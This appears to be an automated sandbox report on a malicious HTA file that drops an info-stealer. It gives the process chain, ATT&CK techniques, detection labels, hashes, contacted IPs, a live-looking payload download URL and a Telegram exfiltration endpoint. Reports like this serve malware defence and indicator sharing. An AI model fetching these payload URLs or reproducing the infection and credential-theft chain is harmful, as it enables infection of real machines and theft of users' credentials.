                    Source: Yara match; File source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000007.00000002.2506031760.0000000002305000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match; File source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR
                    Source: Yara match; File source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR
                    Source: Yara match; File source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\csoss.exe; Code function 6_2_00226283: socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket
                    Source: C:\Users\user\AppData\Roaming\csoss.exe; Code function 6_2_00226747: socket, WSAGetLastError, bind, WSAGetLastError, closesocket

                    MITRE ATT&CK Matrix
                    Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.
                    Techniques with matched signatures (signature count as shown in the matrix):
                    Initial Access: Valid Accounts (2)
                    Execution: Native API (12); Command and Scripting Interpreter (11); PowerShell (3)
                    Persistence: DLL Side-Loading (1); Valid Accounts (2)
                    Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (212)
                    Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); DLL Side-Loading (1); Masquerading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (21); Access Token Manipulation (21); Process Injection (212)
                    Credential Access: OS Credential Dumping (1); Input Capture (121)
                    Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (128); Security Software Discovery (331); Virtualization/Sandbox Evasion (21); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1); System Network Configuration Discovery (1)
                    Lateral Movement: no matched techniques
                    Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (11); Input Capture (121); Clipboard Data (3)
                    Command and Control: Ingress Tool Transfer (12); Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (23)
                    Exfiltration: no matched techniques
                    Impact: System Shutdown/Reboot (1)

                    Behavior Graph ID: 1640149; Sample: needagoodplanforsuccesstoge...; Start date: 17/03/2025; Architecture: WINDOWS; Score: 100
                    Sample-level DNS/IP: reallyfreegeoip.org; checkip.dyndns.org; checkip.dyndns.com
                    Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
                    Signature on reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
                    Process tree:
                    mshta.exe
                        Signatures: Suspicious command line found; PowerShell case anomaly found
                        cmd.exe
                            Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; PowerShell case anomaly found
                            conhost.exe
                            powershell.exe
                                DNS/IP: 23.95.235.28, 49724, 80, AS-COLOCROSSINGUS, United States
                                Dropped: C:\Users\user\AppData\Roaming\csoss.exe (PE32); C:\Users\user\AppData\Local\...\csoss[1].exe (PE32); C:\Users\user\AppData\...\dkgvurtz.cmdline (Unicode)
                                Signatures: Loading BitLocker PowerShell Module; Powershell drops PE file
                                csoss.exe
                                    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; 4 other signatures
                                    RegSvcs.exe
                                        DNS/IP: checkip.dyndns.com 193.122.130.0, 49725, 80, ORACLE-BMC-31898US, United States; reallyfreegeoip.org 104.21.96.1, 443, 49726, CLOUDFLARENETUS, United States
                                        Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                                csc.exe
                                    Dropped: C:\Users\user\AppData\Local\...\dkgvurtz.dll (PE32)
                                    cvtres.exe

                    Antivirus detection (submitted file)
                    Source | Detection | Scanner | Label
                    needagoodplanforsuccesstogetbackbest.hta | 47% | Virustotal |
                    needagoodplanforsuccesstogetbackbest.hta | 28% | ReversingLabs | Script-WScript.Trojan.Asthma
                    Antivirus detection (dropped files)
                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Roaming\csoss.exe | 100% | Avira | TR/AD.SnakeStealer.ergur
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exe | 100% | Avira | TR/AD.SnakeStealer.ergur
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exe | 83% | ReversingLabs | Win32.Trojan.AutoitInject
                    C:\Users\user\AppData\Roaming\csoss.exe | 83% | ReversingLabs | Win32.Trojan.AutoitInject
                    No Antivirus matches
                    No Antivirus matches
                    Antivirus detection (URLs)
                    Source | Detection | Scanner | Label
                    http://23.95.235.28/110/csoss.exe$ | 0% | Avira URL Cloud | safe
                    http://23.95.235.28/110/csoss.exe | 0% | Avira URL Cloud | safe
                    http://23.95.235.28/110/csoss.exev | 0% | Avira URL Cloud | safe
                    http://checkip.dyndns.com0nu | 0% | Avira URL Cloud | safe
                    http://23.95.235.28/110/csoss.ex | 0% | Avira URL Cloud | safe
                    Contacted domains
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    reallyfreegeoip.org | 104.21.96.1 | true | false | | high
                    checkip.dyndns.com | 193.122.130.0 | true | false | | high
                    checkip.dyndns.org | unknown | unknown | false | | high
                    Contacted URLs
                    Name | Malicious | Antivirus Detection | Reputation
                    https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
                    http://checkip.dyndns.org/ | false | | high
                    http://23.95.235.28/110/csoss.exe | true | Avira URL Cloud: safe | unknown
                    URLs from memory and binaries
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1393474414.0000000002D5E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://crl.microsoft | powershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1393474414.0000000002D5E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://reallyfreegeoip.orgd | RegSvcs.exe, 00000007.00000002.2506031760.000000000227D000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://contoso.com/License | powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://contoso.com/Icon | powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://checkip.dyndns.org | RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.000000000224E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://23.95.235.28/110/csoss.exev | powershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                    https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1393474414.0000000002D5E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://checkip.dyndns.com0nu | RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://reallyfreegeoip.org/xml/8.46.123.189l | RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://crl.micro | powershell.exe, 00000003.00000002.1398726052.0000000007300000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://23.95.235.28/110/csoss.exe$ | powershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                    http://checkip.dyndns.comd | RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://aka.ms/pscore6lB | powershell.exe, 00000003.00000002.1394587679.0000000004C01000.00000004.00000800.00020000.00000000.sdmp | false
                                                            high
                                                            https://ion=v4.5powershell.exe, 00000003.00000002.1393474414.0000000002D26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://checkip.dyndns.org/qcsoss.exe, 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://contoso.com/powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://reallyfreegeoip.org/xml/8.46.123.189dRegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2506031760.000000000227D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://checkip.dyndns.orgdRegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://checkip.dyndns.comRegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://23.95.235.28/110/csoss.expowershell.exe, 00000003.00000002.1394587679.00000000050BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://checkip.dyndns.org/dRegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1394587679.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.00000000021E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://api.telegram.org/bot-/sendDocument?chat_id=csoss.exe, 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reallyfreegeoip.org/xml/csoss.exe, 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        high
IP             Domain                Country         ASN    ASN Name             Malicious
23.95.235.28   unknown               United States   36352  AS-COLOCROSSINGUS    true
104.21.96.1    reallyfreegeoip.org   United States   13335  CLOUDFLARENETUS      false
193.122.130.0  checkip.dyndns.com    United States   31898  ORACLE-BMC-31898US   false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1640149
Start date and time: 2025-03-17 01:17:50 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: needagoodplanforsuccesstogetbackbest.hta
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winHTA@14/15@2/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 57
• Number of non-executed functions: 272
Cookbook Comments:
• Found application associated with file extension: .hta
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.12.23.50
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
00:18:50  Task Scheduler   Run new task: {876D3960-16D6-4B12-8542-5AD288769BF3} path: .
20:18:59  API Interceptor  42x Sleep call for process: powershell.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        23.95.235.28APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/rmo/rmn/needagoodplanforsuccesstogetbackbest.hta
                                                                                        APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/rmo/rmn/needagoodplanforsuccesstogetbackbest.hta
                                                                                        FORMULARZ ODPRAWY CELNEJ DHL.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/rmo/needagoodplanforsuccesstogetbackbest.hta
                                                                                        efs.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                        • 23.95.235.28/60/csso.exe
                                                                                        dok PZ 2025-03-11_142242 fin_Orygina#U0142.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/rsc/rc/efs.hta
                                                                                        dok PZ 2025-03-11_142242 fin_Orygina#U0142.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/rsc/rc/efs.hta
                                                                                        uhg.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                        • 23.95.235.28/50/csso.exe
                                                                                        Neue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/rsc/uhg.hta
                                                                                        Neue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/rsc/uhg.hta
                                                                                        Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.28/xampp/ugccs/yougetgoodthingswithbestadvantageforthis.hta
                                                                                        104.21.96.1ADES_PO_Confirmation_20250307_pdf.bat.exeGet hashmaliciousLokibotBrowse
                                                                                        • touxzw.ir/sccc/five/fre.php
                                                                                        Transferencia 6997900002017937.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.askvtwv8.top/uztg/
                                                                                        hh01FRs81x.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.newanthoperso.shop/3nis/?LL=4FHLH&R4lxS2-P=7Jez/f8BRsPhvFRcTYEfxOkzfWBvvrnmo+4qP8uldvbHjjygNPFvdo5E4tKnf+Ij1qWwstrtA/xMUYgdGo9Dw7YPXWw4NGSG4oy32mHU2IUoylmJFg==
                                                                                        yloe82Jp1k.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.sigaque.today/n61y/
                                                                                        A2h6QhZIKx.exeGet hashmaliciousAzorultBrowse
                                                                                        • k1d5.icu/TP341/index.php
                                                                                        DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.rbopisalive.cyou/2dxw/
                                                                                        r_BBVA_MensajeSWIFT04-03-2025-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.kdrqcyusevx.info/k7wl/
                                                                                        MUH030425.exeGet hashmaliciousAzorultBrowse
                                                                                        • k1d5.icu/TP341/index.php
                                                                                        Invoice Remittance ref20250226.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.rbopisalive.cyou/a669/
                                                                                        368c6e62-b031-5b65-fd43-e7a610184138.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • ce60771026585.oakdiiocese.org/r/74?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        reallyfreegeoip.orgCloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.32.1
                                                                                        iCgb4kAWFh.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.16.1
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.64.1
                                                                                        SOA OF FEB 2025 PT.BINEX.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.64.1
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.80.1
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.64.1
                                                                                        Ogdu1MivyN.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                        • 104.21.64.1
                                                                                        FVWbiG8vBc.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.112.1
                                                                                        TOP20250252.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.80.1
                                                                                        QUOTATION_MARQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                        • 104.21.16.1
                                                                                        checkip.dyndns.comCloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 132.226.8.169
                                                                                        iCgb4kAWFh.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 132.226.247.73
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        SOA OF FEB 2025 PT.BINEX.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 158.101.44.242
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 132.226.247.73
                                                                                        Ogdu1MivyN.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                        • 132.226.8.169
                                                                                        FVWbiG8vBc.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 193.122.130.0
                                                                                        TOP20250252.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 158.101.44.242
                                                                                        QUOTATION_MARQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                        • 132.226.247.73
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        AS-COLOCROSSINGUSverynicegirlgivenmebestwordforgreatnesswithgoodthings.htaGet hashmaliciousUnknownBrowse
                                                                                        • 192.3.95.138
                                                                                        Build.exeGet hashmaliciousStormKittyBrowse
                                                                                        • 23.94.126.116
                                                                                        h2wb5_002.exeGet hashmaliciousDarkVision RatBrowse
                                                                                        • 104.168.28.10
                                                                                        dBKUxeI.exeGet hashmaliciousAsyncRAT, DarkVision RatBrowse
                                                                                        • 104.168.28.10
                                                                                        random.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, XmrigBrowse
                                                                                        • 107.174.192.179
                                                                                        earereallyniceloverwithgreatthingsonthatkissinggirlonme.htaGet hashmaliciousRemcosBrowse
                                                                                        • 172.245.191.88
                                                                                        goodmanwnatgoodthingsforbesthings.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                        • 192.3.101.146
                                                                                        Our Order.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 198.12.89.24
                                                                                        ienetstatgoodforkissing.htaGet hashmaliciousCobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                        • 192.227.228.22
                                                                                        Proof of Payment and Statement.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 192.227.228.22
                                                                                        CLOUDFLARENETUSJITZq92T28.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.64.41.3
                                                                                        12Kp1xbcjv.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.32.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
 | JITZq92T28.exe | malicious | Unknown | 172.64.41.3
 | 41QUE01 - TAX INVOICE - 7274916 from SFG (Brisbane).html | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 172.67.70.233
 | CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.32.1
 | https://apply.atu.ie/_entity/sharepointdocumentlocation/a10f35db-a302-f011-bae2-7c1e524f2423/903e00e6-7542-ee11-bdf3-6045bd8c56d2?file=CONFIDENTIALDoc_Au89994.pdf | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 188.114.96.3
 | jbJFtxTmyS.exe | malicious | AsyncRAT, XWorm | 172.67.72.57
 | iCgb4kAWFh.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.16.1
 | CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.64.1
 | SOA OF FEB 2025 PT.BINEX.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.64.1
ORACLE-BMC-31898US | CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.6.168
 | SOA OF FEB 2025 PT.BINEX.exe | malicious | MSIL Logger, MassLogger RAT | 158.101.44.242
 | CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.6.168
 | FVWbiG8vBc.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.130.0
 | TOP20250252.exe | malicious | Snake Keylogger | 158.101.44.242
 | DHL Shipping Details Ref ID 4466331798008765975594-pdf.exe | malicious | MSIL Logger, MassLogger RAT | 158.101.44.242
 | ienetstatgoodforkissing.hta | malicious | Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | 193.122.6.168
 | 7495 P.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
 | SOA FEB 2025.exe | malicious | MSIL Logger, MassLogger RAT | 158.101.44.242
 | 13.03.2025-13.03.2025 shtml.exe | malicious | MSIL Logger, MassLogger RAT | 158.101.44.242

Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.96.1
 | iCgb4kAWFh.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.96.1
 | CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.96.1
 | SOA OF FEB 2025 PT.BINEX.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.96.1
 | CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.96.1
 | CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.96.1
 | Ogdu1MivyN.exe | malicious | DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | 104.21.96.1
 | FVWbiG8vBc.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.96.1
 | Extreme Injector v3.exe | malicious | XWorm | 104.21.96.1
 | shit.exe.bin.exe | malicious | Unknown | 104.21.96.1

No context
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):980992
                                                                                        Entropy (8bit):6.875555651887693
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:/u6J33O0c+JY5UZ+XC0kGso6Fa4aL34eprdWY:Ju0c++OCvkGs9Fa4aL341Y
                                                                                        MD5:54DE0C8E192E7BC71B6D284FFF136296
                                                                                        SHA1:F2AB671CBF4229C9C7EA12F01B148E470B6621E7
                                                                                        SHA-256:D274A8FCA173BF675C950AAD9A3D09EF48DCE2522756BC6BEBA0E08DB8DCFC90
                                                                                        SHA-512:5EE16D7EB2ED2B7CF85225ACC2FDB43144581CA54BB171FE129B5F2ABF5E067D1BFE9472616714BB869C7AC3765CCF22873F56F116BBFA6F1CEE37863D35F258
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                                        Reputation:low
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...y..g.........."..................}............@..........................`............@...@.......@.....................L...|....p...o.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....o...p...p..................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1328
                                                                                        Entropy (8bit):5.398844453842513
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:3KhWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NK3R8UHr8Htq:wWSU4y4RQmFoUeWmfmZ9tK8NWR8Wz
                                                                                        MD5:DC919BD1325B842F85F1CD8545CE95E6
                                                                                        SHA1:501D7B8E198022F709FFA12AF4E7D5F190E4BAFE
                                                                                        SHA-256:EF48B744193A91742F2394D682EF24B39BBDFE90FC6B0C5A3C8DE4E54056EFF4
                                                                                        SHA-512:4148554E3ED755D0D797DA8A9591BF6DC35428FD849CC6FDCDD0355D1738F57D3E98BBE7F4108A1705B7C57F570F0514F5FDE822D3DC8A8C2750B1348D05FA8C
                                                                                        Malicious:false
                                                                                        Reputation:low
